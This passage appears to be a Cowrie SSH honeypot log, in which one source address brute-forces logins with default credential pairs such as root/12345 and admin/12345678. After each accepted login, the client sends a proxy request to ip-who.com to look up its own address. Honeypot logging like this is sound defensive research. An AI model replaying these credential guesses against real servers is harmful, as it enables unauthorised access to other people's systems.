com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:02:17.568901Z","src_ip":"212.227.235.229","session":"c259b467aef1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54324,"dst_ip":"1.2.3.4","dst_port":22,"session":"ce7198bd4014","protocol":"ssh","message":"New connection: 212.227.235.229:54324 (1.2.3.4:22) [session: ce7198bd4014]","sensor":"my-vps","timestamp":"2025-08-28T08:02:17.917425Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:02:18.186798Z","src_ip":"212.227.235.229","session":"ce7198bd4014"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:02:19.197309Z","src_ip":"212.227.235.229","session":"ce7198bd4014"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"oracle","message":"login attempt [oracle/oracle] failed","sensor":"my-vps","timestamp":"2025-08-28T08:02:21.596791Z","src_ip":"212.227.235.229","session":"ce7198bd4014"}
{"eventid":"cowrie.login.success","username":"root","password":"12345","message":"login attempt [root/12345] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:02:21.723497Z","src_ip":"212.227.235.229","session":"877e9ecef19b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-28T08:02:22.054375Z","session":"877e9ecef19b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-28T08:02:22.871976Z","src_ip":"212.227.235.229","session":"877e9ecef19b"}
{"eventid":"cowrie.session.closed","duration":"7.7","message":"Connection lost after 7.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:02:23.139371Z","src_ip":"212.227.235.229","session":"877e9ecef19b"}
{"eventid":"cowrie.login.success","username":"root","password":"password","message":"login attempt [root/password] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:02:23.469697Z","src_ip":"212.227.235.229","session":"5f2f080aca26"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-28T08:02:23.761410Z","session":"5f2f080aca26"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-28T08:02:24.020902Z","src_ip":"212.227.235.229","session":"5f2f080aca26"}
{"eventid":"cowrie.session.closed","duration":"13.0","message":"Connection lost after 13.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:02:24.280080Z","src_ip":"212.227.235.229","session":"5f2f080aca26"}
{"eventid":"cowrie.session.closed","duration":"7.2","message":"Connection lost after 7.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:02:25.076326Z","src_ip":"212.227.235.229","session":"ce7198bd4014"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49990,"dst_ip":"1.2.3.4","dst_port":22,"session":"5d8abc41938d","protocol":"ssh","message":"New connection: 212.227.235.229:49990 (1.2.3.4:22) [session: 5d8abc41938d]","sensor":"my-vps","timestamp":"2025-08-28T08:02:26.527311Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:02:26.587961Z","src_ip":"212.227.235.229","session":"5d8abc41938d"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:02:26.822580Z","src_ip":"212.227.235.229","session":"5d8abc41938d"}
{"eventid":"cowrie.login.success","username":"root","password":"welc0me","message":"login attempt [root/welc0me] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:02:28.739521Z","src_ip":"212.227.235.229","session":"5d8abc41938d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-28T08:02:29.072497Z","session":"5d8abc41938d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-28T08:02:29.393874Z","src_ip":"212.227.235.229","session":"5d8abc41938d"}
{"eventid":"cowrie.login.failed","username":"plex","password":"plex","message":"login attempt [plex/plex] failed","sensor":"my-vps","timestamp":"2025-08-28T08:02:31.839023Z","src_ip":"212.227.235.229","session":"c259b467aef1"}
{"eventid":"cowrie.session.closed","duration":"5.9","message":"Connection lost after 5.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:02:32.463037Z","src_ip":"212.227.235.229","session":"5d8abc41938d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37660,"dst_ip":"1.2.3.4","dst_port":22,"session":"b2d1d4fc1852","protocol":"ssh","message":"New connection: 212.227.235.229:37660 (1.2.3.4:22) [session: b2d1d4fc1852]","sensor":"my-vps","timestamp":"2025-08-28T08:02:33.837807Z"}
{"eventid":"cowrie.session.closed","duration":"16.7","message":"Connection lost after 16.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:02:34.044908Z","src_ip":"212.227.235.229","session":"c259b467aef1"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:02:34.074477Z","src_ip":"212.227.235.229","session":"b2d1d4fc1852"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:02:34.234813Z","src_ip":"212.227.235.229","session":"b2d1d4fc1852"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47638,"dst_ip":"1.2.3.4","dst_port":22,"session":"0b55e85aef96","protocol":"ssh","message":"New connection: 212.227.235.229:47638 (1.2.3.4:22) [session: 0b55e85aef96]","sensor":"my-vps","timestamp":"2025-08-28T08:02:34.612166Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:02:34.613638Z","src_ip":"212.227.235.229","session":"0b55e85aef96"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:02:34.869025Z","src_ip":"212.227.235.229","session":"0b55e85aef96"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"asteriskftp","message":"login attempt [ftpuser/asteriskftp] failed","sensor":"my-vps","timestamp":"2025-08-28T08:02:36.687004Z","src_ip":"212.227.235.229","session":"b2d1d4fc1852"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:02:38.230967Z","src_ip":"212.227.235.229","session":"b2d1d4fc1852"}
{"eventid":"cowrie.login.failed","username":"admin","password":"12345678","message":"login attempt [admin/12345678] failed","sensor":"my-vps","timestamp":"2025-08-28T08:02:38.699671Z","src_ip":"212.227.235.229","session":"0b55e85aef96"}
{"eventid":"cowrie.session.closed","duration":"5.4","message":"Connection lost after 5.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:02:39.971544Z","src_ip":"212.227.235.229","session":"0b55e85aef96"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34814,"dst_ip":"1.2.3.4","dst_port":22,"session":"f5a67dc4d42b","protocol":"ssh","message":"New connection: 212.227.235.229:34814 (1.2.3.4:22) [session: f5a67dc4d42b]","sensor":"my-vps","timestamp":"2025-08-28T08:02:43.202472Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:02:43.203677Z","src_ip":"212.227.235.229","session":"f5a67dc4d42b"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:02:43.464213Z","src_ip":"212.227.235.229","session":"f5a67dc4d42b"}
{"eventid":"cowrie.login.failed","username":"1234","password":"1234","message":"login attempt [1234/1234] failed","sensor":"my-vps","timestamp":"2025-08-28T08:02:44.325538Z","src_ip":"212.227.235.229","session":"f5a67dc4d42b"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:02:45.589655Z","src_ip":"212.227.235.229","session":"f5a67dc4d42b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42786,"dst_ip":"1.2.3.4","dst_port":22,"session":"7dc1296ddc46","protocol":"ssh","message":"New connection: 212.227.235.229:42786 (1.2.3.4:22) [session: 7dc1296ddc46]","sensor":"my-vps","timestamp":"2025-08-28T08:02:50.994484Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:02:50.996625Z","src_ip":"212.227.235.229","session":"7dc1296ddc46"}
